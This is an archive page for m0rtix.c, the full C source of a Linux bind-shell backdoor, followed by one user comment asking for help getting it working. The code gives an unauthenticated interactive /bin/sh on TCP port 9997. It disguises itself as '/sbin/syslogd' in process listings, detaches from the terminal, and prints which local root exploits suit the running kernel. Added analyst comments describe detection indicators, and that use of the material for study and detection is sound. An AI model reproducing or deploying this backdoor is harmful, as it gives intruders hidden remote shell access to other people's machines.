
m0rtix.c

m0rtix.c
Posted Apr 29, 2006
Authored by jeremy still

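m0rtix.c is a simple Linux backdoor written in C that binds a shell to a TCP port and attaches it to a forked tty. The process is disguised in process listings (the listing does this by overwriting argv[0] with "/sbin/syslogd"), and it contains a kernel version detector that prints which local root exploits the author associates with the running kernel.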

tags | tool, shell, kernel, local, root, rootkit
systems | linux, unix
MD5 | 6503eae7a42fb2d5336a3a0cde0c5bb0

m0rtix.c

/* r0nin v3.0 by m0rtix */      

//////////////////////////////////////////////////////////////////
// Bind port, "ps aux" masked, Tell u if rootab or no etc... //
// //
// m0rtix (c) 2006 //
// irc.epiknet.org #hakin9 //
// //
// Une petite pensée pour Sympt0me.... //
//reloaded_matrix_revolutions@hotmail.com //
//////////////////////////////////////////////////////////////////

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <pwd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>

#include <sys/resource.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <sys/wait.h>



/*
 * Compile-time settings. For an analyst, MASK and PORT are the two values
 * most likely to surface as host and network artifacts of this sample.
 */
/* String copied over argv[0] in main(), so the command line shown for the
 * process claims to be the system logger. */
#define MASK "/sbin/syslogd"
/* Value used for the HOME= entry in the spawned shell's environment. */
#define HOME "/"
/* Terminal ioctl request numbers, hard-coded as literals in this file
 * (<sys/ioctl.h> is not among the includes above). */
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
/* In-band marker byte: leserver() treats it as the start of a 5-byte
 * window-size message inside the client's data stream. */
#define ECHAR 0x1d
/* Size of the relay buffer used between the socket and the pty. */
#define BUF 32768
/* TCP port number; the startup banner in main() prints the same value. */
#define PORT 9997

/* Forward declarations. rootab() and noroot() are declared here but have no
 * definition in the visible listing. */
int leserver(void);
int rootab(void);
int noroot(void);
int kwst(void);
int oslinux(void);
int bsdbsd(void);



/*
 * Entry point of the sample.
 *
 * Looks up the invoking user's login name and the uname() data, overwrites
 * argv[0] with MASK, prints a startup banner to stdout, runs the
 * kernel-version lookup (kwst) and then calls leserver(), which sets up the
 * listening socket.
 *
 * Analyst / detection notes:
 *  - The only "hiding" performed here is the strcpy() over argv[0]. Nothing in
 *    this listing changes the executable path or removes the process from the
 *    process table, so on Linux a mismatch between the reported command line
 *    and /proc/<pid>/exe is a usable indicator.
 *  - The banner is written to the launching terminal's stdout, so it can show
 *    up in captured terminal or session logs.
 */
int main(int argc, char *argv[]) {



// Resolve the login name for the real UID; it is only used in the banner.
// NOTE(review): getpwuid() is not checked for NULL, and login is allocated and
// copied with exactly strlen() bytes (no terminator), so the "%s" below reads
// an unterminated buffer.

int uid = getuid();
struct passwd *pwd_str;
pwd_str = getpwuid(uid);
char *login;
login = malloc(strlen(pwd_str->pw_name));
strncpy(login, pwd_str->pw_name, strlen(pwd_str->pw_name));

// Fetch kernel and host identification (sysname, nodename, release) for the banner.

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

// Process-name masking: the command line seen by tools such as ps is replaced
// with MASK ("/sbin/syslogd"). The copy is unbounded with respect to the
// original argv[0] length.
strcpy(argv[0], MASK);

fprintf(stdout, "\n\t ,--. | o ");
fprintf(stdout, "\n\t,-.-.| |,---.|--- .. , ");
fprintf(stdout, "\n\t| | || || | | >< ");
fprintf(stdout, "\n\t` ' '`--'` `---'`' ` \n");

fprintf(stdout, "\nPsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = %ld\n", (long)getpid());

// The port in this message is a literal in the format string, not the PORT macro.
fprintf(stdout, "Shell on: 9997 User: %s UID: %ld\n", login, (long)getuid());
fprintf(stdout, "Name: %s (Masked in PS! ) v: = %s %s %s\n\n", argv[0], bof->sysname, bof->nodename, bof->release);

// Print the kernel-version lookup result, then start the listener.
kwst();
leserver();



return 0;
}

//////////////////////////////


//LESERVER - listen on 9997 port and give U a shell...

/*
 * Local definition of the terminal window-size record passed to the
 * TIOCSWINSZ ioctl in leserver(). It is declared here by hand; the file does
 * not include <sys/ioctl.h>.
 */
struct winsize {
unsigned short ws_row;     /* rows, in characters */
unsigned short ws_col;     /* columns, in characters */
unsigned short ws_xpixel;  /* set to 0 by leserver() */
unsigned short ws_ypixel;  /* set to 0 by leserver() */
};

/////////////////////////////////////////////////:

/*
 * Build a legacy BSD-style pty device name into buf.
 *
 * num  - index 0..255; the high nibble selects a letter from "pqrstuvwxyzabcde",
 *        the low nibble a hex digit.
 * base - path prefix ("/dev/pty" or "/dev/tty" at the call sites).
 * buf  - output; must hold strlen(base) + 3 bytes. No bound is checked here.
 *
 * Example: num = 0 with base "/dev/pty" yields "/dev/ptyp0".
 */
void get_tty(int num, char *base, char *buf)
{
char series[] = "pqrstuvwxyzabcde";
char subs[] = "0123456789abcdef";
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}


/////////////////////////////////////////////

/*
 * Find a free pseudo-terminal pair by scanning the 256 legacy BSD-style
 * device names produced by get_tty().
 *
 * tty - out: descriptor of the slave side ("/dev/tty??").
 * pty - out: descriptor of the master side ("/dev/pty??").
 *
 * Returns 1 when both sides of some pair were opened, 0 when none of the 256
 * pairs could be opened.
 *
 * Analyst note: a shell whose stdio is one of these /dev/tty[p-za-e][0-9a-f]
 * devices is a host artifact of this code path.
 */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;

/* /dev/ptmx is opened and closed at once; the descriptor is not used
 * anywhere else in this function. */
fd = open("/dev/ptmx", O_RDWR);
close(fd);

for (i=0; i < 256; i++) {
get_tty(i, "/dev/pty", buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, "/dev/tty", buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
/* master opened but slave did not: release the master and try the next pair */
close(*pty);
continue;
}
return 1;
}
return 0;
}

///////////////////////////////////////////////////

/*
 * SIGCHLD handler: re-installs itself and reaps at most one exited child
 * without blocking (WNOHANG). The signal number argument is unused.
 */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}

//////////////////////////////////////////////////:

/*
 * Handler installed for SIGHUP and SIGTERM in the per-connection process:
 * sends SIGHUP and then SIGTERM to every process in the caller's process
 * group (pid 0). The signal number argument is unused.
 */
void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}

/////////////////////////////////////////////////////

/*
 * Listener and per-connection relay.
 *
 * Creates a TCP socket bound to INADDR_ANY (all local interfaces), detaches
 * stdio to /dev/null, then loops on accept(). Each accepted connection is
 * handled in a forked child that reads environment strings from the client,
 * obtains a pty pair via open_tty(), forks again to exec "/bin/sh -i" on the
 * slave side, and relays bytes between the socket and the pty master until
 * either side closes.
 *
 * Returns 1 if socket(), bind() or listen() fails; otherwise it does not
 * return (the accept loop is infinite).
 *
 * Analyst / detection notes:
 *  - There is no authentication step between accept() and execve(): any peer
 *    that can reach the port receives a shell running as the user who started
 *    the program.
 *  - The relay is plain read()/write() with no encryption, so the session is
 *    visible to network inspection as cleartext shell traffic.
 *  - Listening port: the defines and the startup banner give TCP 9997.
 *  - Host artifacts: a TCP listener owned by a process whose command line was
 *    rewritten to "/sbin/syslogd" (see main), with "sh -i" descendants whose
 *    stdio is a legacy /dev/tty?? pty.
 *  - Environment entries for the shell are taken from the client, so they are
 *    attacker-controlled input to /bin/sh.
 */
int leserver(void) {
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}

/* bind to every local address */
bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(port);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 5) < 0) {
perror("listen");
return 1;
}

fflush(stdout);

/* detach: new session, cwd "/", stdin/stdout/stderr redirected to /dev/null
 * (pid is reused here as a scratch file descriptor) */
setsid();
chdir("/");
pid = open("/dev/null", O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli < 0) continue;
/* one child process per accepted connection */
pid = fork();
if (pid == 0) {
int subshell;
int tty;
int pty;
fd_set fds;
char buf[BUF];
char *argv[] = {"sh", "-i", NULL};
#define MAXENV 256
#define ENVLEN 256
char *envp[MAXENV];
char envbuf[(MAXENV+2) * ENVLEN];
int j, i;
char home[256];

/* Build the shell environment: slot 0 is HOME=<HOME>; the following slots
 * point into envbuf, which is filled from the client in ENVLEN-byte reads.
 * Reading stops on a short read, after MAXENV chunks, or when a chunk
 * starts with '\n'.
 * NOTE(review): with j == MAXENV the writes to envp[j] / envp[j+1] fall
 * outside envp[MAXENV], and chunks are not explicitly NUL-terminated. */
envp[0] = home;
sprintf(home, "HOME=%s", HOME);
j = 0;
do {
i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
envp[j+1] = &envbuf[j * ENVLEN];
j++;
if ((j >= MAXENV) || (i < ENVLEN)) break;
} while (envbuf[(j-1) * ENVLEN] != '\n');
envp[j+1] = NULL;

/* put this connection handler in its own process group */
setpgid(0, 0);

/* open slave & master side of tty; on failure tell the client and exit */
if (!open_tty(&tty, &pty)) {
char msg[] = "Can't fork pty, bye!\n";
write(scli, msg, strlen(msg));
close(scli);
exit(0);
}
/* second fork: the child becomes the interactive shell */
subshell = fork();
if (subshell == 0) {
/* close master */
close(pty);
/* new session with the pty slave as controlling terminal */
setsid();
ioctl(tty, TIOCSCTTY);
/* close local part of connection */
close(scli);
close(sock);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
/* shell stdio is the pty slave, not the socket */
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
/* the return value of execve() is not checked */
execve("/bin/sh", argv, envp);
}
/* close slave */
close(tty);

signal(SIGHUP, hangout);
signal(SIGTERM, hangout);

/* relay loop: pty master <-> client socket */
while (1) {
/* watch tty and client side */
FD_ZERO(&fds);
FD_SET(pty, &fds);
FD_SET(scli, &fds);
if (select((pty > scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
/* shell output -> client */
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
/* client input -> shell, with in-band window-size messages */
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count <= 0) break;

/* An ECHAR (0x1d) byte starts a 5-byte message: marker, then columns and
 * rows as two big-endian 16-bit values. */
p = memchr(buf, ECHAR, count);
if (p) {
unsigned char wb[5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;

/* copy what arrived of the message; read the remainder from the socket
 * if fewer than 5 bytes are in this buffer */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 - rlen);
}

/* apply the size to the pty and notify the process group */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(pty, TIOCSWINSZ, &ws);
kill(0, SIGWINCH);

/* forward the bytes before the marker, then any bytes after the message */
write(pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong)p+5);
if (rlen > 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;
}
}
/* session over: close descriptors, reap the shell, hang up the terminal */
close(scli);
close(sock);
close(pty);

waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
/* parent: the connection now belongs to the child */
close(scli);
}
}

////////////////////////////////////////////////////////////////////////



//END LESERVER


/////////////////////////////////////

//KWST - rootab ??????????
/*
 * Dispatch on the operating system name reported by uname(): calls
 * oslinux() for "Linux" and bsdbsd() for "FreeBSD"; any other sysname prints
 * nothing. Exits the process with status 1 if uname() fails. Always returns 0.
 */
int kwst(void) {

struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *osdev = bof->sysname;

if (strcmp(osdev, "Linux") == 0)
oslinux(); else { if(strcmp(osdev, "FreeBSD") == 0) {
bsdbsd(); }}

return 0; }
//END KWST

//////////////////////////////////////

//OSLINUX - if is Linux:

/*
 * Print, for a fixed list of Linux 2.2 / 2.4 / 2.6 release prefixes, the
 * names the author associates with local privilege-escalation exploits.
 *
 * The function only compares the uname() release string against hard-coded
 * prefixes and prints text; it probes nothing and executes nothing. Exits the
 * process with status 1 if uname() fails. Always returns 0.
 *
 * Analyst notes:
 *  - Every kernel line listed predates the April 2006 posting date of this
 *    file; a host still matching one of these prefixes is running a kernel
 *    that is long out of maintenance.
 *  - A prefix match is not evidence of exposure: the release string says
 *    nothing about vendor backports, so treat the output as the author's
 *    rule of thumb only.
 *  - The 2.6.10 - 2.6.15 comparisons use length 5, so each of them compares
 *    only the first five characters of its pattern ("2.6.1").
 */
int oslinux(void) {

///////////////// THanks to Anissina_Keiko ///////////////////////////////


struct utsname *bof = (struct utsname*) malloc(sizeof(struct utsname));
int test;
if(test = uname(bof)) {
printf("Error %i\n", test);
exit(1); }

char *kernelver = bof->release;

//////////////////////////////////////////// KERNEL 2.2.* //////////////////

if (strncmp(kernelver, "2.2.", 4) == 0)
{
printf("\nRootab !! use: ptrace!");
}
//////////////////////////////////////////// KERNEL 2.4.* //////////////////
else if(strncmp(kernelver, "2.4.17", 6) == 0)
{
printf("\nRootab !! use: Kmod, newlocal !");
} else if (strncmp(kernelver, "2.4.18", 6) == 0)
{
printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.19", 6) == 0)
{
printf("\nRootab !! use: Brk, newlocal, Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.20", 6) == 0)
{
printf("\nRootab !! use: elflbl, Ptrace, Brk2, w00t(if 2003), Kmod or Kmod2 !");
} else if (strncmp(kernelver, "2.4.21", 6) == 0)
{
printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Krad3(if elSMP), Kmod2 !");
} else if (strncmp(kernelver, "2.4.22", 6) == 0)
{
printf("\nRootab !! use: Brk2, Ptrace, w00t(if 2003), Kmod2 !");
} else if (strncmp(kernelver, "2.4.23", 6) == 0)
{
printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.24", 6) == 0)
{
printf("\nRootab !! use: mremap_pte!");
} else if (strncmp(kernelver, "2.4.25", 6) == 0)
{
printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.26", 6) == 0)
{
printf("\nRootab !! use: mremap_pte, Uselib24!");
} else if (strncmp(kernelver, "2.4.27", 6) == 0)
{
printf("Rootab !! use: don't know lol!\n");
}
//////////////////////////////////////////////////// KERNEL 2.6.* ///////////////////
else if (strncmp(kernelver, "2.6.2", 5) == 0)
{
printf("\nRootab !! use: expand_stack, mremap_pte!");
} else if (strncmp(kernelver, "2.6.3", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.4", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.5", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.6", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.7", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.8", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004) !");
} else if (strncmp(kernelver, "2.6.9", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.10", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.11", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad2(if 2004), Krad3 !");
} else if (strncmp(kernelver, "2.6.12", 5) == 0)
{
printf("\nRootab !! use: expand_stack, Krad2(if 2004) !");
} else if (strncmp(kernelver, "2.6.13", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.14", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else if (strncmp(kernelver, "2.6.15", 5) == 0)
{
printf("\nRootab !! use: expand_stack !");
} else
{
// no hard-coded prefix matched: report the release string as-is
printf("\nDon't know for ths version: %s\n", kernelver);
}

return 0;
}

//END OS

/////////////////////////////////////////

//BSDBSD If FreeBSD:

/*
 * FreeBSD branch of the kernel lookup: prints a fixed message saying the
 * sample has no version table for FreeBSD. Always returns 0.
 */
int bsdbsd(void) {
fprintf(stdout, "\n\t Oh NOoo !!! it's a FreeBSD system, i can't say you if this sheat is rootab !!\n\n");
return 0;
}

//BSDBSD END

////////////////////////////////////////////

Comments (1)

userx

Here, i get a problem...when I try to connect to server with nc a get a message: "can't create pty!!!"

or something like this..

I want to make a simple bind shell with tty, but it seems so hard to make it works...
can you help me?

my email is: userx.gnu@gmail.com

Thanks for everything anyway

Comment by userx
2012-07-10 18:50:23 UTC | Permalink | Reply
